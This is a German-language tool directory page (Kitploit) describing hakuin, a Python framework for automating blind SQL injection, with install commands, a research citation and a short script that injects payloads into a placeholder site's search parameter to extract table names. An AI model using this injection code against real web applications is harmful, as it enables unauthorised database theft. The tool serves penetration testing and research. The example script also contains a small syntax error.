Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
hakuin — Ein blitzschnelles und vollständig konfigurierbares Optimierungs- und Automatisierungsframework für Blind-SQL-Injection. | Kitploit
Tools/GitHubGitHub/pruzko/hakuin
SchwachstellenscannerWebsicherheitPenetrationstests
GitHubpruzko/hakuin

hakuin

Ein blitzschnelles und vollständig konfigurierbares Optimierungs- und Automatisierungsframework für Blind-SQL-Injection.

Repository anzeigen
14110vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Hakuin ist ein Framework zur Optimierung und Automatisierung von Blind SQL Injection (BSQLI), geschrieben in Python 3. Es abstrahiert die Extraktionslogik und ermöglicht es Benutzern, einfach und effizient Datenbanken von anfälligen Webanwendungen zu dumpen. Um den Prozess zu beschleunigen, nutzt Hakuin eine Vielzahl von Optimierungsmethoden, darunter vortrainierte und adaptive Sprachmodelle, opportunistisches Raten, statistische Modellierung, Parallelität, ternäre Abfragen und mehr.

Hakuin wurde auf angesehenen akademischen und industriellen Konferenzen vorgestellt:

  • BSides, Bratislava, 2025
  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offensive Technology (WOOT), 2023

Weitere Informationen finden Sie in unserem Paper und unseren Folien.

Installation

Um Hakuin zu installieren, führen Sie einfach aus:

root@kitploit:~
pip3 install hakuin

Command Line Tool

Hakuin wird mit einem intuitiven Tool ausgeliefert, das die meisten Funktionen von Hakuin direkt von der Befehlszeile aus bietet:

root@kitploit:~
hk -h

Custom Scripting

Manchmal sind BSQLI-Schwachstellen zu knifflig, um sie von der Befehlszeile aus auszunutzen, und erfordern benutzerdefinierte Skripte. Hier glänzt Hakuin, da Sie absolut alles anpassen können – die Injektionslogik, die Inferenzlogik und sogar die Abfragen.

Hier ist ein minimales Beispiel:

root@kitploit:~
import asyncio
import aiohttp
from hakuin import Extractor, Requester

class SimpleRequester(Requester):
    async def request(self, query, ctx):
        payload = query.render(ctx)
        url = f'http://target.com/users?search=XXX" OR ({payload})--'
        async with aiohttp.request('GET', url) as resp:
            return resp.status == 200

async def main():
    requester = SimpleRequester():
    ext = Extractor(requester=requester, dbms='sqlite')
    data = await ext.extract_table_names()
    print(data)

asyncio.run(main())

Stellen Sie sicher, dass Sie unser Tutorial durchgehen.

For Researchers

Dieses Repository wird aktiv weiterentwickelt, um den Bedürfnissen von Sicherheitsexperten gerecht zu werden. Forscher, die die in unserem Paper beschriebenen Experimente reproduzieren möchten, sollten die eingefrorene Version installieren, da sie den Originalcode, Experiment-Skripte und ein Handbuch zur Reproduktion der Ergebnisse enthält.

Hakuin zitieren

root@kitploit:~
@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}
Tool herunterladen